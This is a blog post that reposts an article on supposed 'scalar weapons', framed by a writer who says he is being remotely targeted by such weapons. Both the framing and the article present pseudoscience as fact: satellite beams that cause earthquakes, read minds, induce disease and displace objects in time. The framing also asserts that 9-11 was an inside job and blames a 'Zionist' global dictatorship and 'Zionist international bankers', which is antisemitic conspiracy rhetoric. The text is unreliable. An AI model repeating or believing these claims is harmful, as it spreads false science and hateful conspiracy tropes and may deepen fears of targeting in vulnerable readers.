<< "Число с плавающей запятой двойной точности double имеет размер: " << sizeof(double) << std::endl;
return 0;
}
\n является символом новой строки. Результат программы с использованием компилятора С++ Shell.
Целое число int имеет размер: 4
Целое число short имеет размер: 2
Длинное целое число long имеет размер: 8
Символ char имеет размер: 1
Число с плавающей запятой одинарной точности float имеет размер: 4
Число с плавающей запятой двойной точности double имеет размер: 8
Тип bool представляет собой логический тип данных и может принимать только одно из двух значений: true (истина) и false (ложь).
За исключением типа bool целочисленные типы могут иметь знаковое (signed) и беззнаковое (unsigned) представление. Знаковый тип может принимать отрицательные и положительные числа (включая нуль), а беззнаковый - только положительные числа (включая нуль). Т.е. если вы точно знаете, что значение переменной не может быть отрицательным, используйте беззнаковый тип. Запись такого типа имеет вид unsigned int, unsigned long и т.д.
Похожие публикации
2015-11-29 • Просмотров [ 242 ]
|
__label__pos
| 0.57742 |
Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
647 lines (539 sloc) 15.6 KB
// Copyright 2013 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package ssh
import (
"crypto/rand"
"errors"
"fmt"
"io"
"log"
"net"
"sync"
)
// debugHandshake, if set, prints messages sent and received. Key
// exchange messages are printed as if DH were used, so the debug
// messages are wrong when using ECDH.
const debugHandshake = false
// chanSize sets the amount of buffering SSH connections. This is
// primarily for testing: setting chanSize=0 uncovers deadlocks more
// quickly.
const chanSize = 16
// keyingTransport is a packet based transport that supports key
// changes. It need not be thread-safe. It should pass through
// msgNewKeys in both directions.
type keyingTransport interface {
packetConn
// prepareKeyChange sets up a key change. The key change for a
// direction will be effected if a msgNewKeys message is sent
// or received.
prepareKeyChange(*algorithms, *kexResult) error
}
// handshakeTransport implements rekeying on top of a keyingTransport
// and offers a thread-safe writePacket() interface.
type handshakeTransport struct {
conn keyingTransport
config *Config
serverVersion []byte
clientVersion []byte
// hostKeys is non-empty if we are the server. In that case,
// it contains all host keys that can be used to sign the
// connection.
hostKeys []Signer
// hostKeyAlgorithms is non-empty if we are the client. In that case,
// we accept these key types from the server as host key.
hostKeyAlgorithms []string
// On read error, incoming is closed, and readError is set.
incoming chan []byte
readError error
mu sync.Mutex
writeError error
sentInitPacket []byte
sentInitMsg *kexInitMsg
pendingPackets [][]byte // Used when a key exchange is in progress.
// If the read loop wants to schedule a kex, it pings this
// channel, and the write loop will send out a kex
// message.
requestKex chan struct{}
// If the other side requests or confirms a kex, its kexInit
// packet is sent here for the write loop to find it.
startKex chan *pendingKex
// data for host key checking
hostKeyCallback HostKeyCallback
dialAddress string
remoteAddr net.Addr
// bannerCallback is non-empty if we are the client and it has been set in
// ClientConfig. In that case it is called during the user authentication
// dance to handle a custom server's message.
bannerCallback BannerCallback
// Algorithms agreed in the last key exchange.
algorithms *algorithms
readPacketsLeft uint32
readBytesLeft int64
writePacketsLeft uint32
writeBytesLeft int64
// The session ID or nil if first kex did not complete yet.
sessionID []byte
}
type pendingKex struct {
otherInit []byte
done chan error
}
func newHandshakeTransport(conn keyingTransport, config *Config, clientVersion, serverVersion []byte) *handshakeTransport {
t := &handshakeTransport{
conn: conn,
serverVersion: serverVersion,
clientVersion: clientVersion,
incoming: make(chan []byte, chanSize),
requestKex: make(chan struct{}, 1),
startKex: make(chan *pendingKex, 1),
config: config,
}
t.resetReadThresholds()
t.resetWriteThresholds()
// We always start with a mandatory key exchange.
t.requestKex <- struct{}{}
return t
}
func newClientTransport(conn keyingTransport, clientVersion, serverVersion []byte, config *ClientConfig, dialAddr string, addr net.Addr) *handshakeTransport {
t := newHandshakeTransport(conn, &config.Config, clientVersion, serverVersion)
t.dialAddress = dialAddr
t.remoteAddr = addr
t.hostKeyCallback = config.HostKeyCallback
t.bannerCallback = config.BannerCallback
if config.HostKeyAlgorithms != nil {
t.hostKeyAlgorithms = config.HostKeyAlgorithms
} else {
t.hostKeyAlgorithms = supportedHostKeyAlgos
}
go t.readLoop()
go t.kexLoop()
return t
}
func newServerTransport(conn keyingTransport, clientVersion, serverVersion []byte, config *ServerConfig) *handshakeTransport {
t := newHandshakeTransport(conn, &config.Config, clientVersion, serverVersion)
t.hostKeys = config.hostKeys
go t.readLoop()
go t.kexLoop()
return t
}
func (t *handshakeTransport) getSessionID() []byte {
return t.sessionID
}
// waitSession waits for the session to be established. This should be
// the first thing to call after instantiating handshakeTransport.
func (t *handshakeTransport) waitSession() error {
p, err := t.readPacket()
if err != nil {
return err
}
if p[0] != msgNewKeys {
return fmt.Errorf("ssh: first packet should be msgNewKeys")
}
return nil
}
func (t *handshakeTransport) id() string {
if len(t.hostKeys) > 0 {
return "server"
}
return "client"
}
func (t *handshakeTransport) printPacket(p []byte, write bool) {
action := "got"
if write {
action = "sent"
}
if p[0] == msgChannelData || p[0] == msgChannelExtendedData {
log.Printf("%s %s data (packet %d bytes)", t.id(), action, len(p))
} else {
msg, err := decode(p)
log.Printf("%s %s %T %v (%v)", t.id(), action, msg, msg, err)
}
}
func (t *handshakeTransport) readPacket() ([]byte, error) {
p, ok := <-t.incoming
if !ok {
return nil, t.readError
}
return p, nil
}
func (t *handshakeTransport) readLoop() {
first := true
for {
p, err := t.readOnePacket(first)
first = false
if err != nil {
t.readError = err
close(t.incoming)
break
}
if p[0] == msgIgnore || p[0] == msgDebug {
continue
}
t.incoming <- p
}
// Stop writers too.
t.recordWriteError(t.readError)
// Unblock the writer should it wait for this.
close(t.startKex)
// Don't close t.requestKex; it's also written to from writePacket.
}
func (t *handshakeTransport) pushPacket(p []byte) error {
if debugHandshake {
t.printPacket(p, true)
}
return t.conn.writePacket(p)
}
func (t *handshakeTransport) getWriteError() error {
t.mu.Lock()
defer t.mu.Unlock()
return t.writeError
}
func (t *handshakeTransport) recordWriteError(err error) {
t.mu.Lock()
defer t.mu.Unlock()
if t.writeError == nil && err != nil {
t.writeError = err
}
}
func (t *handshakeTransport) requestKeyExchange() {
select {
case t.requestKex <- struct{}{}:
default:
// something already requested a kex, so do nothing.
}
}
func (t *handshakeTransport) resetWriteThresholds() {
t.writePacketsLeft = packetRekeyThreshold
if t.config.RekeyThreshold > 0 {
t.writeBytesLeft = int64(t.config.RekeyThreshold)
} else if t.algorithms != nil {
t.writeBytesLeft = t.algorithms.w.rekeyBytes()
} else {
t.writeBytesLeft = 1 << 30
}
}
func (t *handshakeTransport) kexLoop() {
write:
for t.getWriteError() == nil {
var request *pendingKex
var sent bool
for request == nil || !sent {
var ok bool
select {
case request, ok = <-t.startKex:
if !ok {
break write
}
case <-t.requestKex:
break
}
if !sent {
if err := t.sendKexInit(); err != nil {
t.recordWriteError(err)
break
}
sent = true
}
}
if err := t.getWriteError(); err != nil {
if request != nil {
request.done <- err
}
break
}
// We're not servicing t.requestKex, but that is OK:
// we never block on sending to t.requestKex.
// We're not servicing t.startKex, but the remote end
// has just sent us a kexInitMsg, so it can't send
// another key change request, until we close the done
// channel on the pendingKex request.
err := t.enterKeyExchange(request.otherInit)
t.mu.Lock()
t.writeError = err
t.sentInitPacket = nil
t.sentInitMsg = nil
t.resetWriteThresholds()
// we have completed the key exchange. Since the
// reader is still blocked, it is safe to clear out
// the requestKex channel. This avoids the situation
// where: 1) we consumed our own request for the
// initial kex, and 2) the kex from the remote side
// caused another send on the requestKex channel,
clear:
for {
select {
case <-t.requestKex:
//
default:
break clear
}
}
request.done <- t.writeError
// kex finished. Push packets that we received while
// the kex was in progress. Don't look at t.startKex
// and don't increment writtenSinceKex: if we trigger
// another kex while we are still busy with the last
// one, things will become very confusing.
for _, p := range t.pendingPackets {
t.writeError = t.pushPacket(p)
if t.writeError != nil {
break
}
}
t.pendingPackets = t.pendingPackets[:0]
t.mu.Unlock()
}
// drain startKex channel. We don't service t.requestKex
// because nobody does blocking sends there.
go func() {
for init := range t.startKex {
init.done <- t.writeError
}
}()
// Unblock reader.
t.conn.Close()
}
// The protocol uses uint32 for packet counters, so we can't let them
// reach 1<<32. We will actually read and write more packets than
// this, though: the other side may send more packets, and after we
// hit this limit on writing we will send a few more packets for the
// key exchange itself.
const packetRekeyThreshold = (1 << 31)
func (t *handshakeTransport) resetReadThresholds() {
t.readPacketsLeft = packetRekeyThreshold
if t.config.RekeyThreshold > 0 {
t.readBytesLeft = int64(t.config.RekeyThreshold)
} else if t.algorithms != nil {
t.readBytesLeft = t.algorithms.r.rekeyBytes()
} else {
t.readBytesLeft = 1 << 30
}
}
func (t *handshakeTransport) readOnePacket(first bool) ([]byte, error) {
p, err := t.conn.readPacket()
if err != nil {
return nil, err
}
if t.readPacketsLeft > 0 {
t.readPacketsLeft--
} else {
t.requestKeyExchange()
}
if t.readBytesLeft > 0 {
t.readBytesLeft -= int64(len(p))
} else {
t.requestKeyExchange()
}
if debugHandshake {
t.printPacket(p, false)
}
if first && p[0] != msgKexInit {
return nil, fmt.Errorf("ssh: first packet should be msgKexInit")
}
if p[0] != msgKexInit {
return p, nil
}
firstKex := t.sessionID == nil
kex := pendingKex{
done: make(chan error, 1),
otherInit: p,
}
t.startKex <- &kex
err = <-kex.done
if debugHandshake {
log.Printf("%s exited key exchange (first %v), err %v", t.id(), firstKex, err)
}
if err != nil {
return nil, err
}
t.resetReadThresholds()
// By default, a key exchange is hidden from higher layers by
// translating it into msgIgnore.
successPacket := []byte{msgIgnore}
if firstKex {
// sendKexInit() for the first kex waits for
// msgNewKeys so the authentication process is
// guaranteed to happen over an encrypted transport.
successPacket = []byte{msgNewKeys}
}
return successPacket, nil
}
// sendKexInit sends a key change message.
func (t *handshakeTransport) sendKexInit() error {
t.mu.Lock()
defer t.mu.Unlock()
if t.sentInitMsg != nil {
// kexInits may be sent either in response to the other side,
// or because our side wants to initiate a key change, so we
// may have already sent a kexInit. In that case, don't send a
// second kexInit.
return nil
}
msg := &kexInitMsg{
KexAlgos: t.config.KeyExchanges,
CiphersClientServer: t.config.Ciphers,
CiphersServerClient: t.config.Ciphers,
MACsClientServer: t.config.MACs,
MACsServerClient: t.config.MACs,
CompressionClientServer: supportedCompressions,
CompressionServerClient: supportedCompressions,
}
io.ReadFull(rand.Reader, msg.Cookie[:])
if len(t.hostKeys) > 0 {
for _, k := range t.hostKeys {
msg.ServerHostKeyAlgos = append(
msg.ServerHostKeyAlgos, k.PublicKey().Type())
}
} else {
msg.ServerHostKeyAlgos = t.hostKeyAlgorithms
}
packet := Marshal(msg)
// writePacket destroys the contents, so save a copy.
packetCopy := make([]byte, len(packet))
copy(packetCopy, packet)
if err := t.pushPacket(packetCopy); err != nil {
return err
}
t.sentInitMsg = msg
t.sentInitPacket = packet
return nil
}
func (t *handshakeTransport) writePacket(p []byte) error {
switch p[0] {
case msgKexInit:
return errors.New("ssh: only handshakeTransport can send kexInit")
case msgNewKeys:
return errors.New("ssh: only handshakeTransport can send newKeys")
}
t.mu.Lock()
defer t.mu.Unlock()
if t.writeError != nil {
return t.writeError
}
if t.sentInitMsg != nil {
// Copy the packet so the writer can reuse the buffer.
cp := make([]byte, len(p))
copy(cp, p)
t.pendingPackets = append(t.pendingPackets, cp)
return nil
}
if t.writeBytesLeft > 0 {
t.writeBytesLeft -= int64(len(p))
} else {
t.requestKeyExchange()
}
if t.writePacketsLeft > 0 {
t.writePacketsLeft--
} else {
t.requestKeyExchange()
}
if err := t.pushPacket(p); err != nil {
t.writeError = err
}
return nil
}
func (t *handshakeTransport) Close() error {
return t.conn.Close()
}
func (t *handshakeTransport) enterKeyExchange(otherInitPacket []byte) error {
if debugHandshake {
log.Printf("%s entered key exchange", t.id())
}
otherInit := &kexInitMsg{}
if err := Unmarshal(otherInitPacket, otherInit); err != nil {
return err
}
magics := handshakeMagics{
clientVersion: t.clientVersion,
serverVersion: t.serverVersion,
clientKexInit: otherInitPacket,
serverKexInit: t.sentInitPacket,
}
clientInit := otherInit
serverInit := t.sentInitMsg
if len(t.hostKeys) == 0 {
clientInit, serverInit = serverInit, clientInit
magics.clientKexInit = t.sentInitPacket
magics.serverKexInit = otherInitPacket
}
var err error
t.algorithms, err = findAgreedAlgorithms(clientInit, serverInit)
if err != nil {
return err
}
// We don't send FirstKexFollows, but we handle receiving it.
//
// RFC 4253 section 7 defines the kex and the agreement method for
// first_kex_packet_follows. It states that the guessed packet
// should be ignored if the "kex algorithm and/or the host
// key algorithm is guessed wrong (server and client have
// different preferred algorithm), or if any of the other
// algorithms cannot be agreed upon". The other algorithms have
// already been checked above so the kex algorithm and host key
// algorithm are checked here.
if otherInit.FirstKexFollows && (clientInit.KexAlgos[0] != serverInit.KexAlgos[0] || clientInit.ServerHostKeyAlgos[0] != serverInit.ServerHostKeyAlgos[0]) {
// other side sent a kex message for the wrong algorithm,
// which we have to ignore.
if _, err := t.conn.readPacket(); err != nil {
return err
}
}
kex, ok := kexAlgoMap[t.algorithms.kex]
if !ok {
return fmt.Errorf("ssh: unexpected key exchange algorithm %v", t.algorithms.kex)
}
var result *kexResult
if len(t.hostKeys) > 0 {
result, err = t.server(kex, t.algorithms, &magics)
} else {
result, err = t.client(kex, t.algorithms, &magics)
}
if err != nil {
return err
}
if t.sessionID == nil {
t.sessionID = result.H
}
result.SessionID = t.sessionID
if err := t.conn.prepareKeyChange(t.algorithms, result); err != nil {
return err
}
if err = t.conn.writePacket([]byte{msgNewKeys}); err != nil {
return err
}
if packet, err := t.conn.readPacket(); err != nil {
return err
} else if packet[0] != msgNewKeys {
return unexpectedMessageError(msgNewKeys, packet[0])
}
return nil
}
func (t *handshakeTransport) server(kex kexAlgorithm, algs *algorithms, magics *handshakeMagics) (*kexResult, error) {
var hostKey Signer
for _, k := range t.hostKeys {
if algs.hostKey == k.PublicKey().Type() {
hostKey = k
}
}
r, err := kex.Server(t.conn, t.config.Rand, magics, hostKey)
return r, err
}
func (t *handshakeTransport) client(kex kexAlgorithm, algs *algorithms, magics *handshakeMagics) (*kexResult, error) {
result, err := kex.Client(t.conn, t.config.Rand, magics)
if err != nil {
return nil, err
}
hostKey, err := ParsePublicKey(result.HostKey)
if err != nil {
return nil, err
}
if err := verifyHostKeySignature(hostKey, result); err != nil {
return nil, err
}
err = t.hostKeyCallback(t.dialAddress, t.remoteAddr, hostKey)
if err != nil {
return nil, err
}
return result, nil
}
|
__label__pos
| 0.999893 |
The tag has no usage guidance.
learn more… | top users | synonyms
12
votes
4answers
699 views
What software has the features I need to replace Skype?
For the past few years Skype has been getting progressively worse with each iteration. Skype 5 moved away from the compact 2.X era interface to an interface that's much more wasteful and less usable. ...
7
votes
2answers
22k views
Can I use 2 iPhones as walkie talkie? (without internet!)
I want to use 2 (or more) iPhones as walkie talkie (i.e. they talk each other without needing internet/voice call). Of course this should work with wifi, because it doesn't make much sense a to have ...
7
votes
7answers
49k views
What's the best iPhone SIP apps work internationally and allow recording?
So far, Siphon is the best SIP app I've tried. MobileVOIP and TruPhone are very nice too (and don't need jailbreaking). Other apps offer at least some SIP features such as Nimbuzz, Fring, Viber and ...
3
votes
2answers
2k views
What SIP voip client for OS X I could use?
I'm looking for a, preferably free, SIP client for OS X, one that will allow multiple SIP accounts and preferably supporting g729 audio codec.
3
votes
1answer
425 views
Can volume automatically decrease during communication activity?
A feature of Windows 7 that I really like that it can decrease the volume of system sounds/music by 50%/80%/mute entirely when it senses communication activity, ie. Skype call, Google Voice call, etc. ...
3
votes
7answers
9k views
What iOS apps allow free calling to the UK?
I travel a lot, so often rely on WiFi for calling. On the iPhone, I use MagicJack to get completely free calls over WiFi/VoIP to US numbers. I'm looking for a similar app to enable me to call UK ...
2
votes
4answers
14k views
Caller ID spoofing or change caller ID?
Is there a subscription site or iPhone application for changing caller id or caller id spoofing? In other words I want to call someone, but I want to change my number (for example 000000 or 111111). ...
2
votes
1answer
140 views
iphone voip services allowed?
Does Apple and either AT&T or Verizon currently allow voip services to be used? Essentially, would a user be able to have phone services by using just a data plan?
1
vote
2answers
2k views
How to unmask the SIP credentials in the Zoiper VoIP application?
Is it possible to unmask the SIP credentials stored in the Preferences of the Zoiper VoIP application ? I couldn't find any password unmask application for that and I can't find the password in my ...
1
vote
1answer
215 views
Using iPhone on VoIP landline?
At my home I have a bundled internet connection and a VoIP landline. These services are provided with a Huawei HG659 Wi-Fi modem. Is there a way I can connect my iPhone to my VoIP landline via Wi-Fi? ...
1
vote
0answers
25 views
Floating, transparent Mute Status for Call Center use?
We have a call center with agents taking calls with Bria. Due to limitations of the setup, Auto-Answer is the most convenient way of having calls connected. However, this creates a problem that agents ...
1
vote
0answers
76 views
Not able to log into the LINE VOIP service using a MacBook Air via wifi at home
I have a MacBook Air with Corei5 and it is connected to web through a netgear wifi router at home. I am able to connect to the web without any problems but I am just not able to log into LINE using ...
1
vote
0answers
348 views
Is there an alternative Ventrilo client for OS X?
Are there any decent software packages for OS X that can connect to Vent servers? The Ventrilo for Mac client isn't up to much.
0
votes
1answer
92 views
Mavericks based VOIP solution needed
I am traveling and as usual, I brought my Vonage box. It blew. So I have a Vonage account and no means to connect to it. Any ideas? The Vonage App - SoftPhone stopped with 10.4! Vonage Companion ...
0
votes
0answers
44 views
Can't hear or be heard when I call from my iphone 5
I cannot hear or be heard when I make a call on my iphone . But when I use VOIP application like viber and skype it works just fine and I can call and hear.My sim card works just fine on other phones....
0
votes
1answer
73 views
Can I play audio from computer through VOIP connection?
I'm using join.me for online presentations. If I have a video I'd like to share, I can't send the sound to join.me. I was thinking perhaps some Soundflower set up might enable this function. Any ideas ...
|
__label__pos
| 0.514396 |
Saturday, January 09, 2010
Further Research Into Scalar Weaponry Deployed Via Satellite & And Some Interesting Hypotheses Regarding Its Use In The Post 9-11 Global Dictatorship
This author read the following article several years ago, and the existence of much of the technology being discussed in the article is certainly plausible. In the late 19TH Century, inventor Nicola Tesla was working on the type of scalar technology which government scientist Tom Bearden was later credited with inventing. However, on the day after Tesla's death, the FBI raided Tesla's apartment and confiscated all of his notes (that is those which were not destroyed in an earlier and deliberately set fire in his Manhattan laboratory). The fire was said to be started by oil magnate John D. Rockefeller, after Tesla refused to sell his research to Rockefeller. Since that time the U.S. Military Intelligence complex has had access to this technology, and more than half a century in which to develop it for the Zionist one world dictatorship agenda.
After more than half a decade of reading about this technology (as well as being remotely targeted by DEW weaponry), I can say with absolute certainty that one of myriad aspects of this global Zionist dictatorship has been to make the public as ignorant as possible. And moreover, to create smokescreens in the way of disinformation and brainless entertainment in order to ensure that the public remains in a state of ignorance regarding this technology.
Such ignorance must be propagated so that these citizens are unable to challenge this immense conspiratorial attack on their freedom. And in order to stay gainfully employed in the United States one must remain ignorant and unwilling to challenge its criminal status quo, or risk being blacklisted while their lives are systematically destroyed. The best examples of this in the modern day can be found in our elected officials as well as those employed by the mainstream media, since these people simply refuse to acknowledge that the attacks on 9-11-2001 were perpetrated by a cabal within the U.S. Military Industrial Intelligence complex, or that these attacks were perpetrated in order to allow the Bush Administration (under PNAC leadership) a plausible reason to wage war on Afghanistan and Iraq - wars which were used to give the Zionist international bankers total control over the Middle East, while seizing the oil and natural gas reserves from Iraq, and ensuring that the Unocal Corporation would be given the right to build the TransAfghanistan oil pipeline across Northern Afghanistan. Something which would never have happened if the United States had not attacked Afghanistan, while nullifying the contract between the Taliban and Argentina to build this pipeline.
Those who are no longer ignorant of the following technology or the fact that it is being used to create a global police state (backed up by advanced scalar weapons with capabilites far beyond the traditional weapons of war) , are being demonized, tortured and murdered by way of these weapons, while our elected officials (for their own safety) refuse to intercede. Not that they would have any chance of doing so any longer, since they would find themselves targeted for the destruction of their careers, lives threatened, and made into the pariahs that those of us being used for non consensual human experimentation have already been made into.
The war which is presently being waged against the global middle class is one in which the mind of the citizen is being attacked. Once the citizen's mind has been neutralized they will become as powerless as the individual heads of cattle which are slaughtered for human consumption - exactly what the Zionist/Illuminati intend to attain for their global dictatorship.
If you live the life of a target of such mind control experimentation long enough, you learn to understand that supporting the Zionist one world government (wittingly or unwittingly) is far more dangerous than death itself. Especially in realizing that by speaking up you do what you can to alert the people of this planet to what is happening to them. Or failing to do so and becoming part of this nefarious plot in which to destroy humanity.
12 Things You Should Know About Scalar Weapons
by Christi Verismo
BRACE YOURSELF FOR SCALAR WEAPON WAR THAT COULD OCCUR
http://www.angelfire.com/oz/cv/scalarweapons.html
1. A possible scalar war scenario
2. How were scalar waves discovered?
3. A closer look at scalar wave-forms
4. How do scalar weapons work?
5. What can scalar weapons do?
6. Scalar beams against individuals
7. Scalar mind control
8. America 's 'no contact' mass mind controlling network
9. Inducing diseases with scalar waves
10. Tesla's technology was secretly continued by Russia and the Nazis
11. Is there a secret war going in the skies?
12. Who else is continuing Tesla's scalar technology?
1. A POSSIBLE SCALAR WAR SCENARIO
The following seems like science fiction, but scalar beam weapons were invented in 1904 by a American immigrant genius called Nicola Tesla (1856 or 57 -1943) from Yugoslavia.
Since he died in 1943, many nations have secretly developed his beam weapons which, now further refined, are so powerful that just by satellite one can:
Make a nuclear like destruction;
Earthquake;
Hurricane;
Tidal wave;
Cause instant freezing - killing every living thing instantly over many miles;
Cause intense heat like a burning fireball over a wide area; induce hypnotic mind control over a whole population; or even read anyone on the planet's mind by remote;
Affect anybody's REM dream sleep by sending in subliminal pictures to the visual cortex;
Cause hallucinagon drug like effects or the symptoms of chemical or biological poisoning;
Make a disease epidemic by imprinting the disease 'signature' right into the cellular structure;
Paralyze and/or kill everyone instantaneously in a 50 mile radius; and lastly
Remove something right out of its place in time and space faster than the speed of light, without any detectable warning by crossing 2 or more beams with each other and any target can be aimed at even right through to the opposite side of the earth.
If either of the major scalar weapon armed countries e.g. U.S. or Russia were to fire a nuclear missile to attack each other, this may possibly not even reach the target because the missile could be destroyed with scalar technology before it even left its place or origin. The knowledge via radio waves that it was about to be fired could be eavesdropped and the target could be destroyed in the bunker, fired at from space by satellite.
Alternatively, invisible moving barriers and globes made of plasma (produced by crossed scalar beams) could destroy any nuclear missile easily while it moves towards the target and failing all these, it could be destroyed by entering the target's territory by passing through a Tesla shield which would explode anything entering its airspace.
To begin with, defense using scalar technology could intercept it before it even landed. Secret eavesdropping of radio communications tapping into ordinary military radio contact using undetectable 'scalar wave carriers' hacking in may have heard military personnel say it was about to be fired. The missile may be destroyed from above the site, using satellites equipped with scalar or particle beam weapons or a cloaked UFO (American or Russian made anti-gravity disk originally made by back engineering crashed alien saucers) or aircraft using scalar or particle beams which could invisibly (and undetectably with standard equipment) cause the target to malfunction and drop down.
By using a scalar wave (radar like) 'interference grid', which covers both country's entire military activities in the air, underground or undersea, scalar transmitters send waves over large areas at 90 deg angles to each other. These waves follow the earth-ionospheric wave guide and curve around the planet.
It is called an 'interference grid' because all solid moving objects show up as a spot of light moving through marked grid squares on an operator's video screen. Scalar waves are a higher form of radar waves, but they go one step further by passing through anything solid too and are able to detect and be able to be made into a focused beam to target anything through the earth or sea as well.
A scalar beam can be sent from a transmitter to the target, coupled with another sent from another transmitter and as they cross, an explosion can be made. This interference grid method could enable scalar beams to explode the missile before launch, as well as en route with knowing the right coordinates. If the target does manage to launch, what are known as Tesla globes, or Tesla hemispheric shields, can be sent to envelop a missile or aircraft. These are made of luminous plasma which emanates physically from crossed scalar beams and can be created any size, even over 100 miles across. Initially detected and tracked as it moves on the scalar interference grid, a continuous EMP (electromagnetic pulse) Tesla plasma globe could kill the electronics of the target. More intensely hot Tesla 'fireball' globes could vaporize the missile.
Tesla globes could also activate a missile's nuclear warhead en route by creating a violent low order nuclear explosion. Various parts of the flying debris can be subjected to smaller more intense Tesla globes where the energy density to destroy is more powerful than the larger globe first encountered. This can be done in pulse mode with any remaining debris given maximum continuous heating to vaporize metals and materials. If anything still rains down on Russia or America, either could have already made a Tesla shield over the targeted area to block it from entering the airspace.
2. HOW WERE SCALAR WAVES DISCOVERED?
Scalar wavelengths are finer than gamma rays or X rays and only one hundred millionth of a square centimeter in width. They belong to the subtle gravitational field and are also known as gravitic waves. Uniquely, they flow in multiple directions at right angles off electromagnetic waves, as an untapped energy source called 'potentials'. Potentials are particles which are unorganized in hyperspace - pure etheric energy not manifest in the physical world. In comparison, electromagnetic waves (measured by so many hertz or pulses per second, which we are familiar with e.g. radio waves) exist normally in the physical world, but can only be measured up to levels determined by the sensitivity of the equipment being used as to how many cycles per second they operate.
Scalar waves were originally detected by a Scottish mathematical genius called James Clerk Maxwell (1831-1879) He linked electricity and magnetism and laid the foundation for modern physics, but unfortunately the very fine scalar waves (which he included in his research) were deliberately left out of his work by the 3 men, including Heinrich Hertz, who laid down the laws taught for physics as a discipline at colleges. They dismissed Maxwell's scalar waves or potentials as "mystical" because they were physically unmanifest and only existed in the "ethers" and so were determined to be too ineffectual for further study. These enigmatic (but more powerful than even microwaves when harnessed and concentrated into a beam) scalar waves may have been forgotten except that Nicola Tesla accidentally rediscovered them. He'd originally worked with Thomas Edison who discovered direct current, but Tesla discovered alternating current. The two men disagreed and eventually parted ways and Tesla later experimented using the research of the German Heinrich Hertz, who was proving the existence of electromagnetic waves. Tesla found, while experimenting with violently abrupt direct current electrical charges, that a new form of energy (scalar) came through.
By 1904, Tesla had developed transmitters to harness scalar energy from one transmitter to another, undetectably bypassing time and space. He could just materialize it from one place to another through hyperspace, without the use of wires, it was just sucked right out of the space-time/vacuum and into a transmitter and into a beam which could be targeted to another transmitter. Unfortunately he got no financial support for replacing electricity, which used wires and therefore earned money, and to this day, this is the reason why scalar energy is still not acknowledged in mainstream physics. Tesla, even though he discovered more for mankind in science than many others, is still not credited in science books for his discovery of scalar waves, a source of "free-energy" obtainable as a limitless source of power that costs nothing. Other inventors have sporadically rediscovered "free-energy" but have come to harm or have been silenced by the sum of millions of dollars hush money, a small sum compared to the sale of electricity, oil, gas and a myriad of other energy producers which would then be rendered worthless. Money hungry big business has harshly crushed any opposition to their own riches, generated by multiple obsolete earth polluting fossil fuels.
3. A CLOSER LOOK AT SCALAR WAVE-FORMS
These finer scalar wave-forms also have been discovered periodically by other mathematicians, who have been able to calculate new equations especially in harmonics (used in hyperdimensional physics) connecting the wavelengths of matter, gravity and light to each other and how all these lock in and create our expression of time (as it manifests in space) - which has been now discovered to be untapped 'potential' energy flowing in hyperspace.
Time flows like a wave-form river in hyperspace in a grid pattern. This consists of interlocking great circles which circle the poles and include a lattice grid of lines that are 30 nautical miles or 55.5 km apart. When scalar beams charge through hyperspace these 'rivers of time' get blocked and redirected temporarily.
There is a covert plan underfoot to change the way time is expressed on this planet altogether using hyperdimensional physics and Tesla technology, by splicing earth back onto a now defunct Atlantean timeline in which Lucifer hadn't fallen from grace. (see my other work on this in the books The Universal Seduction Vols 2 and 3 at the end of this article)
Our present 'reality' is expressed in the way time runs around the corridors in hyperspace by the pattern it takes. Other 'timelines' exist in a different kind of grid pattern, creating alternative versions of our 'present'. Multiple versions of reality (or for example 2 April 2004) can be manipulated given the right technology, and people can enter into parallel universes do all sorts of things and then enter back into this one.
One needs a Tesla Zero Time Reference Generator, which can lodge a specific reality into the time at the center of the universe, in which it stays still, acting like an anchor. Both America and the UK govt are able to manipulate and enter into different realities.
The various dimensions each comprise a complex pattern of interlocking wave-forms. Matter has been found to be only one wave of a pulse comprising a positive cycle, while the negative cycle manifests as 'anti-matter'. The 'matter' pulse brings something 'into' physical visibility, then it disappears momentarily and returns. But the pulses are so rapid we don't see something as unmanifest while temporarily dematerializing. Physical time is only measured by the visibility of something's aging process, or in other words its passage through a journey starting at one measured time-reference point to another.
Different wave-forms only appear to us to be solid because we are comprised of the same matter. If the frequencies governing the time between a matter pulse and an anti-matter pulse are shortened or lengthened with technology, time will go faster or slower in the surrounding space or what it effects. Therefore scalar waves belong to space-time in which anti-matter or hyperspace exists. Time can be altered by harnessed and directed scalar waves (including magnets which give off scalar waves which bend time) because they disrupt the pulse of matter and anti-matter and therefore the rate at which something normally passes through time with its usual smoothness.
An experiment with scalar waves in USA once caused all the clocks and watches in the test neighborhood to go berserk for 4 days, until the flow of time resettled back to its normal flow and they returned as before. This was noted by Frank Golden.
Scalar 'potentials' can be created artificially and when focused into a weapon, can do major damage to an object's location in space-time. That which determines the object's natural pulse of matter and anti-matter cycle can become stressed when targeted by scalar waves made of artificial potentials, because they are almost always absorbed by the nucleus of an atom, not the electrons in orbit.
Hyperspace can become warped temporarily, although space-time naturally curves around natural vortexes the earth has which form 'chakras' to absorb and release universal energies. These are opened and closed in natural cycles according to the positions of the sun and moon in relation to earth. Because scalar waves are finer than gamma waves they can pass through any physical substance undetected. However the damage inflicted can be so powerful that they can dislodge an object right out of time and space and cause it to temporarily disappear away from its normal movement in time. All objects move in time, and they will also move in space if a physical external force activates the object's own natural internal scalar waves to point in the direction it is sent to causing it to move from A to B depending on how much force is used. Or they are trapped motionless in space by the internal scalar energy within swirling around interlocking into a deadlock, (making it appear still) however the object still moves in time. A beam of scalar energy can cause the timeframe the object resides in to get warped, making it disappear into another reality.
4. HOW DO SCALAR WEAPONS WORK?
Particles which are unorganized in hyperspace (potentials) can be harnessed into recreating multiple frequencies of scalar waves and these can now be manufactured artificially and can include frequencies between infrared and ultraviolet. If a transmitter is at a higher reference 'potential' than the interference zone of 2 crossed scalar beams, energy emerges into the plasma 'bottle' which materializes physically and this is called 'exothermic' mode. This can cause explosions and can be 'nuclear like' if set at a high frequency. Even though no electromagnetic energy has flown through space between the transmitters and the target, and because it has bypassed physical space, the energy can suddenly appear faster than the speed of light and destroy something without warning. It is only as a locked in artificial potential that is a directed 'river of force' in hyperspace and it is entirely undetectable with conventional scientific equipment, which is where the danger lies.
Nobody can ever know what the enemy is planning or who their enemies are and because it never gets any press normal military personnel without this knowledge would never know what hit them, especially if it is scalar mind control. To extract energy back to the transmitters from the energy bottle of 2 crossed scalar beams the potential must be set at a lower mode and this is called 'endothermic' mode and as energy is extracted out of the 'bottle' area, a freezing will occur, possibly causing a thunderous sound.
